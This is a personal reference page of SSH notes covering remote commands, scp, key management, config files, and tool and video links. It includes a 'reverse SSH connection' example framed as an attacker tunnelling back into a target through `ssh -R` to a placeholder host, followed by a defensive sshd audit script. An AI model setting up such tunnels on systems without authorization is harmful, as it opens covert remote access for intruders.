# SSH
Secure Shell

---

## Table of Contents
```{contents}
```

---

## Commands Reference

---

### Remote Ops

---

**`ssh`** "secure shell"

options
* `-R` enables remote port forwarding

[example]

Run command `ps` on the remote machine `myserver`.

```bash
ssh myserver ps
ssh username@myserver ps       # specify user name
ssh -l username myserver ps    # specify user name
ssh -p 22 myserver ps          # specify port number
ssh myserver ps > /tmp/ps.out  # redirect the output to a file on your local system
ssh myserver ps \> /tmp/ps.out # redirect the output to a file on the remote system
```

[example]

Run a script remotely.

```bash
ssh myserver bash < ./myscript.sh
```

[example]

test version with leading `echo` (prints each `ssh` command instead of running it)

```bash
for node in web-server{00..09}; do
  echo ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
```

ready version

```bash
for node in web-server{00..09}; do
  ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
```

[example]

wait for a reboot

```bash
until ssh user@10.10.10.10; do sleep 3; done
```

[example]

reverse SSH connection
* `12345` is the port that is opened on the remote system (the attacker); the attacker connects to it to SSH back into the target
* `localhost:22` is where the target delivers those forwarded connections: its own SSH service, which listens on port 22

```bash
ssh -R 12345:localhost:22 user@remoteipaddress
```
```bash
ssh localhost -p 12345 # set up a reverse connection from the attacker system after the target has connected
```
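
Whether a server accepts an `-R` request like the one above is decided by its `sshd` settings. The function below is an added example, not part of the original notes: it reads effective settings in the `keyword value` form printed by `sshd -T` and reports the ones that leave remote forwarding open. The function name and the sample input are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: audit the sshd settings that govern `ssh -R`.
# Input format: one "keyword value" pair per line, as printed by `sshd -T`.
# On a real host: sudo sshd -T | audit_remote_forwarding

audit_remote_forwarding() {
  # Prints one finding per line.
  # Exit status: 0 = remote forwarding refused, 1 = remote forwarding possible.
  awk '
    BEGIN { fwd = "yes"; gw = "no"; listen = "any" }   # OpenSSH defaults
    { key = tolower($1) }
    key == "allowtcpforwarding" { fwd = tolower($2) }
    key == "gatewayports"       { gw = tolower($2) }
    key == "permitlisten"       { listen = tolower($2) }
    END {
      # -R needs forwarding of type yes/all/remote and a permitted listen port.
      if ((fwd != "yes" && fwd != "all" && fwd != "remote") || listen == "none") {
        printf "OK: remote forwarding refused (allowtcpforwarding=%s, permitlisten=%s)\n", fwd, listen
        exit 0
      }
      printf "WARN: allowtcpforwarding=%s accepts ssh -R requests\n", fwd
      if (gw != "no")
        printf "WARN: gatewayports=%s lets forwarded ports bind beyond loopback\n", gw
      if (listen == "any")
        print "WARN: permitlisten=any puts no limit on which ports may be opened"
      exit 1
    }
  '
}

# Constructed sample in `sshd -T` format (not captured from a real host).
sample='port 22
allowtcpforwarding yes
gatewayports no
permitlisten any'

printf '%s\n' "$sample" | audit_remote_forwarding \
  || echo "=> this configuration accepts remote port forwarding"
```

Setting `AllowTcpForwarding` to `no` or `local`, or `PermitListen` to `none`, in `sshd_config` makes the function report `OK`.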

---

**`scp`** "secure copy"

[example]

Upload the file `some_system.tar.gz` to the home directory of user `bob` on remote system `10.0.0.45`.

```bash
scp some_system.tar.gz bob@10.0.0.45:/home/bob/some_system.tar.gz
```

https://www.linuxfoundation.org/blog/blog/classic-sysadmin-how-to-securely-transfer-files-between-servers-with-scp

---

**`sftp`** "secure file transfer protocol"

---

### Key Management

---

* `ssh-add`
  * `ssh-add --apple-use-keychain ~/.ssh/id_ed25519`
  * `ssh-add -l` list private keys currently accessible to ssh-agent
* `ssh-keysign`
* `ssh-keyscan`
* `ssh-keygen`
  * `ssh-keygen -f ~/.ssh/id_ed25519 -t ed25519 -C "email@example.com"`

---

### Service

---

* `sshd`
* `sftp-server`
* `ssh-agent`
  * `eval "$(ssh-agent -s)"`
  * `echo $SSH_AGENT_PID`
  * `echo $SSH_AUTH_SOCK`

---

`ssh-copy-id`
* `ssh-copy-id -i ~/.ssh/id_ed25519 user@host`

OpenSSH Files

`~/.ssh/authorized_keys`

`~/.ssh/known_hosts`

`~/.ssh/config`

```
Host github.com
  AddKeysToAgent yes
  Hostname       github.com
  # IdentityAgent  (no value was given here; ssh rejects this keyword without an argument, so it is commented out)
  IdentityFile   ~/.ssh/id_ed25519
  UseKeychain    yes
  User           git
```

---

## Resources

[ [h](https://www.openssh.com/) ][ [w](https://en.wikipedia.org/wiki/OpenSSH) ] OpenSSH

Tools
* clusterssh - Written in Perl, it opens a bunch of unmanaged terminals in windows.
* mssh (MultiSSH) - GTK+–based multi-SSH client in a single GUI window.
* mussh - MUltihost SSH Wrapper shell script.
* pconsole - Intended for tiling window managers, spawns a terminal per host.
* multixterm - Written in Expect & Tk, drives multiple xterms.
* PAC Manager - A Perl SecureCRT-like GUI on Linux.

More
* https://www.ssh.com/
  * https://www.ssh.com/academy/ssh/port
* https://help.ubuntu.com/community/SSH/OpenSSH/Keys

### YouTube

Akamai Developer
* [ [y](https://www.youtube.com/watch?v=pE3EuiyShoM) ] `02-23-2022`. "How to use Multiple SSH Keys | Managing Different SSH Keys on your System".
* [ [y](https://www.youtube.com/watch?v=33dEcCKGBO4) ] `10-27-2021`. "SSH Key Authentication | How to Create SSH Key Pairs".

LearnLinuxTV
* [ [y](https://www.youtube.com/watch?v=kjFz7Lp8Qjk) ] `02-07-2023`. "Linux Crash Course - Connecting to Linux Servers via SSH".
* [ [y](https://www.youtube.com/watch?v=sBrAVQumqjs) ] `11-14-2022`. "5 Must Have Tweaks to Secure OpenSSH".
* [ [y](https://www.youtube.com/watch?v=v2ii8kdXCic) ] `03-23-2022`. "Speed Up Your SSH Sessions with These Seven Quick SSH Config Tricks".
* [ [y](https://www.youtube.com/watch?v=GxRu35fy-oY) ] `01-10-2022`. "Getting Started with OpenSSH Key Management".
* [ [y](https://www.youtube.com/watch?v=MWqfc_fegVg) ] `11-18-2021`. "The OpenSSH Client Config File: Simplify your SSH Connections".
* [ [y](https://www.youtube.com/watch?v=YS5Zh7KExvE) ] `12-18-2020`. "SSH Full Course - EVERYTHING You Need to Know!".
* [ [y](https://www.youtube.com/watch?v=7OQYlLh0srY) ] `10-21-2019`. "Linux Commands for Beginners 22 - Remote Management with OpenSSH".

More
* [ [y](https://www.youtube.com/watch?v=ORcvSkgdA58) ] `01-31-2019`. Computerphile. "How Secure Shell Works (SSH) - Computerphile".
* [ [y](https://www.youtube.com/watch?v=VsCTp9yH6iQ) ] `03-03-2024`. Lawrence Systems. "Linux Supply Chain Attack Discovered in SSH CVE-2024-3094".
* [ [y](https://www.youtube.com/watch?v=vV_WdTBbww4) ] `04-03-2024`. Low Level Learning. "revealing the features of the XZ backdoor".
* [ [y](https://www.youtube.com/watch?v=tZop-zjYkrU) ] `03-11-2020`. PowerCert Animated Videos. "Telnet vs SSH Explained".
* [ [y](https://www.youtube.com/watch?v=hQWRp-FdTpc) ] `07-08-2018`. Traversy Media. "SSH Crash Course | With Some DevOps".

---

## Texts

* [ [h](http://www.snailbook.com/index.html) ] Barrett, Daniel J.; Richard E. Silverman; & Robert G. Byrnes. (2005). _SSH The Secure Shell: The Definitive Guide_. 2nd Ed. O'Reilly.

---

## Terms

* [ w ] Host Key (authenticates computer)
* [ w ] Identity Key (authenticates user)
* [ [w](https://en.wikipedia.org/wiki/OpenSSH) ] OpenSSH
* [ [w](https://en.wikipedia.org/wiki/PuTTY) ] PuTTY
* [ [w](https://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol) ] SFTP Secure File Transfer Protocol
* [ [w](https://en.wikipedia.org/wiki/Secure_Shell) ] SSH Secure Shell
* [ [w](https://en.wikipedia.org/wiki/Comparison_of_SSH_clients) ] SSH Client
* [ [w](https://en.wikipedia.org/wiki/Comparison_of_SSH_servers) ] SSH Server
* [ [w](https://en.wikipedia.org/wiki/Telnet) ] Telnet

---